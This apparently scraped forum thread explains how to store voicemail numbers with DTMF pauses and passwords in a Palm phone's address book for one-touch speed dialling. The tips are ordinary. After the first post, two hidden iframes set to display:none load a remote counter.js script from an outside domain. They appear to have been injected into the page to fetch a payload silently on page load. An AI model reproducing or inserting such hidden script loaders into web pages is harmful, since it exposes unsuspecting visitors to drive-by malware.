+ Reply to Thread

dialing voicemail with pauses, passwords, etc.

One feature I loved on my previous phone was that I could store my voicemail access numbers, include pauses and passwords so that I could one-touch dial my vm...I know that you can add this numbers to the DTMF file, but that requires pulling out the stylus, pulling down the menu, etc....

Anyone know if you can put numbers with pauses, etc in speed dial or address book so you can just dial and not have to go to the DTMF menu?

Thanks,

Doug<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Great question. I've wondered the same.

Anyone?

Talking DTMF in Speed Dial

Well...I guess I should have played around with it before posting. Here's the scoop...

Go to the Address Book application and put a description and phone number in...I put "check voice mail" in the company name field and then the voice mail call in number and the dtmf sequence for my mailbox and password all in the work phone field...use 'p' for pause and # after the mailbox and password, just as you normally would in a dtmf sequence. Close out the address book entry and assign a speed dial key to that entry using the speed dial application.

When you speed dial the call, on your dialog screen it will say "talk: dtmf". When your voice mail answers, hit the talk button and VOILA...the dtmf tones are sent...

COOL! This puts one big issues out of the way for me...hope that it does for many of you as well.

I've got mine setup similarly, only I use a combo of "hard" and "soft" pauses. A Hard pause waits until you resume the dialing, and a soft pause simply waits 2 seconds. Use a P for a hard pause, and a T for a soft pause.

Here's an example entry in the Palm address book.

(760) 555-1212P19106555T1

So, the phone will dial 760-555-1212. When my voice mail answers, I press the Talk button and the phone will then enter 9106555. It will then wait 2 seconds to enter 1.